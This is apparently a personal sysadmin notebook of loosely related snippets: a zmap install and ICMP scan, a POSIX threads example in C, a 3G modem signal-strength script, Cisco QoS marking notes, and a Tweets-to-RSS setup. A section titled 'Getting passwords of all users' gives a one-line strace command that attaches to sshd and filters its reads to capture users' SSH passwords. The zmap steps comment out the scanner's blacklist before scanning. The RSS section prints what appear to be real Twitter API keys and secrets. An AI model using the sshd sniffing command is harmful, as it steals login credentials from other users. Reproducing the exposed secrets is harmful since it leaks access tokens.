# cd zmap-1.0.0
zmap-1.0.0# cat INSTALL
zmap-1.0.0# apt-get install libgmp3-dev gengetopt libpcap-dev
zmap-1.0.0# cd src
zmap-1.0.0/src# make
zmap-1.0.0/src# make install
zmap-1.0.0/src# cd
# rm -rf zmap-1.0.0 v1.0.0.tar.gz
# sed -i 's/^black/#black/' /etc/zmap/zmap.conf
# zmap -M icmp_echoscan -B 1G -P 1 -T 100 -w subnets.txt
46432 IP addresses scanned in 72 seconds

# Posix threads in C


Differences between processes and threads

- Processes do not share their address space while threads are executed under the same process address space.
- Context switching is faster between threads than between processes.
- Threads can communicate directly (mutex, direct memory access) with other threads of their process, but processes must use IPC (signals, semaphores, queues, shared memory) to communicate with other processes.

Code example

# cat threads_example.c
#include <pthread.h>
#include <stdio.h>

/* Mutex taken around every update of the counter shared by both threads;
 * initialised and destroyed in main(). */
pthread_mutex_t pm;

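/*
 * Thread entry point: increments the int that x_void_ptr points to, one step
 * per lock acquisition, until it reaches 10000, printing every new value.
 *
 * x_void_ptr: pointer to the shared int counter.
 * Returns NULL (the result is not used by the joiner).
 */
void *inc_x(void *x_void_ptr){
        int *x_ptr=(int *)x_void_ptr;
        int done=0;
        while(!done){
                pthread_mutex_lock(&pm);
                /* The limit is tested while holding the mutex: reading the
                 * counter outside the lock while the other thread writes it
                 * is a data race. */
                if(*x_ptr<10000){
                        (*x_ptr)++;
                        printf("[+]x=%d\n",*x_ptr);
                }else{
                        done=1;
                }
                pthread_mutex_unlock(&pm);
        }
        printf("x increment finished\n");
        /* A void * function must return a value. */
        return NULL;
}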

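/*
 * Thread entry point: decrements the int that x_void_ptr points to, one step
 * per lock acquisition, until it reaches 0, printing every new value.
 *
 * x_void_ptr: pointer to the shared int counter.
 * Returns NULL (the result is not used by the joiner).
 */
void *dec_x(void *x_void_ptr){
        int *x_ptr=(int *)x_void_ptr;
        int done=0;
        while(!done){
                pthread_mutex_lock(&pm);
                /* The limit is tested while holding the mutex: reading the
                 * counter outside the lock while the other thread writes it
                 * is a data race. */
                if(*x_ptr>0){
                        (*x_ptr)--;
                        printf("[-]x=%d\n",*x_ptr);
                }else{
                        done=1;
                }
                pthread_mutex_unlock(&pm);
        }
        printf("x decrement finished\n");
        /* A void * function must return a value. */
        return NULL;
}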

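/*
 * Starts one incrementing and one decrementing thread on the same counter
 * (initial value 5000), waits for both and prints the final value.
 *
 * Returns 0 on success, 1 if the mutex or a thread could not be created.
 */
int main(){
        int x=5000;
        int rc;
        pthread_t inc_x_thread;
        pthread_t dec_x_thread;
        printf("Initial x=%d\n",x);
        rc=pthread_mutex_init(&pm,NULL);
        if(rc!=0){
                fprintf(stderr,"pthread_mutex_init failed: %d\n",rc);
                return 1;
        }
        /* pthread_create returns an error number instead of setting errno;
         * joining a thread that was never created is undefined behaviour,
         * so each result is checked before going on. */
        rc=pthread_create(&inc_x_thread,NULL,inc_x,&x);
        if(rc!=0){
                fprintf(stderr,"pthread_create(inc_x) failed: %d\n",rc);
                pthread_mutex_destroy(&pm);
                return 1;
        }
        rc=pthread_create(&dec_x_thread,NULL,dec_x,&x);
        if(rc!=0){
                fprintf(stderr,"pthread_create(dec_x) failed: %d\n",rc);
                /* inc_x stops by itself once x reaches 10000, so this join
                 * returns; the mutex must not be destroyed while in use. */
                pthread_join(inc_x_thread,NULL);
                pthread_mutex_destroy(&pm);
                return 1;
        }
        pthread_join(inc_x_thread,NULL);
        pthread_join(dec_x_thread,NULL);
        pthread_mutex_destroy(&pm);
        printf("Final x=%d\n",x);
        return 0;
}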
# gcc -o threads_example threads_example.c -lpthread

# Getting passwords of all users


# strace -f -e "read" -p `ps axuf | grep -m 1 sshd | awk '{print $2}'` 2>&1 | grep -e '\\7\\0\\0\\0\\4' -e '\\v\\0\\0\\0\\10'

# Getting the 3G signal strength value


Using chat

# sakis3g disconnect
Disconnected.
# chat -V -s '' 'AT+CSQ' 'OK' '' > /dev/ttyUSB0 < /dev/ttyUSB0
AT+CSQ
+CSQ: 19,99

OK
Using comgt

# sakis3g disconnect
Disconnected.
# comgt -d /dev/ttyUSB0 sig
Signal Quality: 19,99
Script with chat
# cat get_rssi
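#!/bin/bash
#
# get_rssi: read the modem's signal quality with AT+CSQ and print the RSSI
# index together with a coarse quality label.
#
# The sakis3g connection is dropped first and re-established at the end; the
# AT dialogue runs on $device in between.

ubp="/usr/bin"
ulsp="/usr/local/sbin"
device="/dev/ttyUSB0"
output="/dev/null"

"$ulsp/sakis3g" disconnect > "$output"

# The inner subshell ties chat's stdin/stdout to the modem; its stderr (where
# -V/-s send the dialogue log) is what goes through the pipe. Only the first
# "+CSQ: <rssi>,<ber>" reply is kept.
csq=$( ("$ubp/chat" -V -s '' 'AT+CSQ' 'OK' '' > "$device" < "$device") 2>&1 \
        | "$ubp/grep" 'CSQ:' | "$ubp/awk" '{print $2; exit}')

# Only the field before the comma is the RSSI index; the second field is the
# bit error rate. The earlier printf "%.f" conversion rounded the whole pair
# as one decimal number under a comma-decimal locale (19,99 became 20) and is
# not a valid number at all under a dot-decimal one.
rssi=${csq%%,*}

if [[ ! "$rssi" =~ ^[0-9]+$ ]]; then
        # No parsable reply (modem busy, port missing, ...): never feed an
        # empty or non-numeric string to the numeric tests below.
        echo "RSSI = unknown"
        echo "Quality = No signal"
else
        # Force base 10 so a reply such as "08" is not read as octal.
        rssi=$((10#$rssi))
        echo "RSSI = $rssi"
        echo -n "Quality = "
        if (( rssi == 99 )); then
                # 99 is the AT+CSQ code for "not known or not detectable".
                echo "No signal"
        elif (( rssi > 25 )); then
                echo "Excellent ( 25 < RSSI )"
        elif (( rssi > 19 )); then
                echo "Good ( 19 < RSSI <= 25 )"
        elif (( rssi > 13 )); then
                echo "Average ( 13 < RSSI <= 19 )"
        elif (( rssi > 7 )); then
                echo "Low ( 7 < RSSI <= 13 )"
        elif (( rssi > 0 )); then
                echo "Very low ( 0 < RSSI <= 7 )"
        else
                echo "No signal"
        fi
fi

# Reached on every path above, so the link is always brought back up.
"$ulsp/sakis3g" connect --console > "$output"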
# ./get_rssi
RSSI = 20
Quality = Good ( 19 < RSSI <= 25 )

# Classification and marking


Fields that can be marked for QoS purposes

- IP header
- LAN trunking header
- Frame Relay header
- ATM cell header

IP Precedence and DSCP compared

The IP header is defined in RFC 791, including a 1-byte field called Type of Service (ToS).
The ToS was further subdivided, with the high-order 3 bits defined as the IP Precedence (IPP):

- Routine: Precedence 0 - 000
- Priority: Precedence 1 - 001
- Immediate: Precedence 2 - 010
- Flash: Precedence 3 - 011
- Flash Override: Precedence 4 - 100
- Critical: Precedence 5 - 101
- Internetwork Control: Precedence 6 - 110
- Network Control: Precedence 7 - 111

A series of RFCs collectively called Differentiated Services (DiffServ) came along later.
The ToS was renamed the Differentiated Services (DS) field, and IPP was replaced with a 6-bit field called the Differentiated Services Code Point (DSCP).

DSCP settings and terminology

Several DiffServ RFCs suggest a set of values to use in the DSCP field and the associated QoS behavior recommended, called Per-Hop Behavior (PHB).

Class selector PHB and DSCP values

IPP overlaps with the first 3 bits of the DSCP.
RFC 2475 defines a set of DSCP values and PHBs, called Class Selector (CS) PHBs, that provide backward compatibility with IPP:

- Default/CS0: 000000 - 000 - Routine
- CS1: 001000 - 001 - Priority
- CS2: 010000 - 010 - Immediate
- CS3: 011000 - 011 - Flash
- CS4: 100000 - 100 - Flash Override
- CS5: 101000 - 101 - Critical
- CS6: 110000 - 110 - Internetwork Control
- CS7: 111000 - 111 - Network Control

Packets with larger CS should be given better queuing preference.

Assured Forwarding PHBs and DSCP values

AF defines four classes (1-4) for queuing purposes, with three levels (1-3) of drop probability inside each queue.
Classes with a higher value get better queuing treatment.
A higher level means a higher probability of being dropped.

- AF11, AF12, AF13: 001010, 001100, 001110
- AF21, AF22, AF23: 010010, 010100, 010110
- AF31, AF32, AF33: 011010, 011100, 011110
- AF41, AF42, AF43: 100010, 100100, 100110

Expedited Forwarding PHB and DSCP values

Packets marked as EF should be given queuing preference so that they experience minimal latency, but they should be policed so that they do not consume all bandwidth on the link or starve other queues.
The DSCP value defined is binary value 101110 (class 5, EF53).

Ethernet LAN Class of Service

Ethernet supports a 3-bit QoS marking field when using either an 802.1q or ISL trunking header.
802.1q defines its QoS field as the 3 most-significant bits of the 2-byte Tag Control field.
ISL defines the 3 least-significant bits from the 1-byte User field.
Generally speaking, these 3 bits are called the Class of Service (CoS).

WAN marking fields

Frame Relay uses the Discard Eligibility (DE) bit. Frames with the DE bit set to 1 are considered candidates to be dropped.
ATM uses the Cell Loss Priority (CLP) bit. Cells with the CLP bit set to 1 are considered candidates to be dropped.
MPLS uses a 3-bit field called Experimental (EXP) for general QoS marking.

Locations for marking and matching

For IPP and DSCP on edge devices.
For CoS, DE, CLP and EXP:

- For classification: on ingress interfaces.
- For marking: on egress interfaces.

Cisco Modular QoS CLI

MQC is a common set of configuration commands to configure many QoS features in a router or switch.
MQC-based tools can be identified by name: they all begin with the phrase "Class-Based" (CB):

- CB Marking
- CB Weighted Fair Queuing (CBWFQ)
- CB Policing
- CB Shaping
- CB Header Compression

Mechanics of MQC

There are three major commands with MQC:

- The class-map command defines the matching parameters.
- The PHB actions (marking, queuing, ...) are configured under the policy-map.
- The policy map is enabled on an interface by using a service-policy command.

Classification using class maps

- The match command has many options for matching packets (QoS fields, ACLs, MACs, ...).
- Class-map names are case sensitive.
- The match protocol command means that IOS uses Network Based Application Recognition (NBAR) to perform the match.
- The match any command matches any packet.
- CEF is required for CB Marking.
! CEF must be enabled for CB Marking.
ip cef
! myclass1: RTP traffic selected by the port arguments below.
class-map match-all myclass1
 match ip rtp 16384 16383 ! (16384-32767)
! myclass2: every packet.
class-map match-all myclass2
 match any
! Classes are processed in order, so myclass2 only marks what myclass1 did not match.
policy-map mypolicy
 class myclass1
  set dscp EF
 class myclass2
  set dscp default
! Enable the policy on fa0/0 in the output direction.
interface fa0/0
 service-policy output mypolicy
Using multiple match commands

- Up to four (CoS and IPP) or eight (DSCP) values can be listed on a single match cos, match precedence or match dscp.
- If a class map has multiple match commands in it, the match-any or match-all (default) keyword defines a logical OR or a logical AND between the match commands.
- The match class _name_ command refers to another class map by name.

Classification using NBAR

NBAR can look past the UDP and TCP header and refer to the host name, URL or MIME type in HTTP requests.
You can upgrade NBAR without changing to a later IOS version. Cisco uses a feature called Packet Description Language Modules (PDLM) to define new protocols that NBAR should match:
ip nbar pdlm _pdlm-name_

Class-Based Marking (CB Marking) configuration

- A CB Marking policy map is processed sequentially; once a packet has matched a class, it is marked based on the set commands.
- You can configure multiple set commands in one class to set multiple fields.
- Packets that do not explicitly match a defined class are considered to have matched a special class called class-default.
- For any class inside the policy map for which there is no set command, packets in that class are not marked.

- set [ip] precedence _value_
- set [ip] dscp _value_
- set cos _value_
- set qos-group _id_ ! Marks the group identifier for the QoS group
- set atm-clp
- set fr-de

CB Marking design choices

Mark as close to the ingress edge of the network as possible but not so close to the edge that the marking is made by an untrusted device.
RFC-recommended values for marking CoS, IPP, DSCP:

- Voice payload: 5, 5, EF
- Video payload: 4, 4, AF41
- Voice/video signaling: 3, 3, CS3
- Mission-critical data: 3, 3, AF31/AF32/AF33
- Transactional data: 2, 2, AF21/AF22/AF23
- Bulk data: 1, 1, AF11/AF12/AF13
- Best effort: 0, 0, BE
- Scavenger: 0, 0, 2/4/6

QoS pre-classification

With VPN traffic, the only thing we have to work with is the ToS byte of the original packet, which is automatically copied to the tunnel header (IPsec transport mode, IPsec tunnel mode and GRE).
But features like NBAR are broken.
Cisco IOS includes a feature called QoS pre-classification that can be enabled on VPN endpoint routers; it keeps the original traffic in memory until the egress QoS actions are taken:

- GRE and IPIP: interface tunnel
- L2F and L2TP: interface virtual-template
- IPsec: crypto map

AutoQoS

AutoQoS is a macro that helps automate class-based QoS configuration using best-practice recommendations.
There are two flavors: AutoQoS for VoIP and for the Enterprise.
To verify AutoQoS configuration use:

- show auto qos
- show mls qos
- show policy-map interface
- show auto discovery qos

AutoQoS for VoIP

Provides QoS both global and interface configuration for voice and video applications.
Is supported on routers and switches.
When enabled on access ports, AutoQoS uses CDP to detect the presence of a Cisco phone or softphone:
- auto qos voip {cisco-phone | cisco-softphone}
- Normal traffic is treated as best effort.
- For phone traffic, the switch trusts the QoS markings it receives.
When enabled on a trunk or uplink, it trusts the CoS or DSCP values received:
- auto qos voip trust

AutoQoS for the Enterprise

Provides QoS both global and interface configuration for voice, video and other network applications.
Is supported on routers.
The command to enable traffic discovery is auto discovery qos [trust] and is configured at the interface, DLCI or PVC level.
Use the trust keyword if you trust the traffic already marked because AutoQoS policies will use those markings during the configuration stage.
The router will classify the traffic collected into one of ten classes:

- Routing: CS6 - EIGRP, OSPF
- VoIP: EF - RTP voice media
- Interactive video: AF41 - RTP video media
- Streaming video: CS4 - Real audio, Netshow
- Control: CS3 - RTCP, H323, SIP
- Transactional: AF21 - SAP, Citrix, Telnet, SSH
- Bulk: AF11 - FTP, SMTP, POP3, Exchange
- Scavenger: CS1 - P2P applications
- Management: CS2 - SNMP, Syslog, DHCP, DNS
- Best effort: All others - All others.

Finally, configure the auto qos command and disable the traffic discovery.

# Tweets to RSS


# apt-get install curl apache2 php5 php5-curl
# url="https://github.com/chrissimpkins/tweetledee/archive/master.zip"
# curl --silent --output tweetledee-master.zip --location $url
# unzip tweetledee-master.zip
# mv tweetledee-master/tweetledee /var/www/.
# # Subscribe an application at https://dev.twitter.com/apps/new
# grep ^.my /var/www/tweetledee/tldlib/keys/tweetledee_keys.php
$my_consumer_key        = '39BeFubG4VQf9XroLGp7Ge';
$my_consumer_secret     = 'svgWXQMWylp8gIIuAc2fPoocIbQcPrBV2LMEj9UYBAU';
$my_access_token        = 'TJJUz9vEsh5rJYsF+2Lcke9yMLVNwrZ8lU11cG5T9ofjWR0R75';
$my_access_token_secret = 'rTEGm4QlcKDhbMnWU5Bsqkrb7teCtQwCE2RPM6JTMh';
$my_domain              = 'ENTER YOUR DOMAIN NAME';
# curl --silent http://127.0.0.1/tweetledee/homerss.php
# curl --silent http://127.0.0.1/tweetledee/userrss.php?user=at1as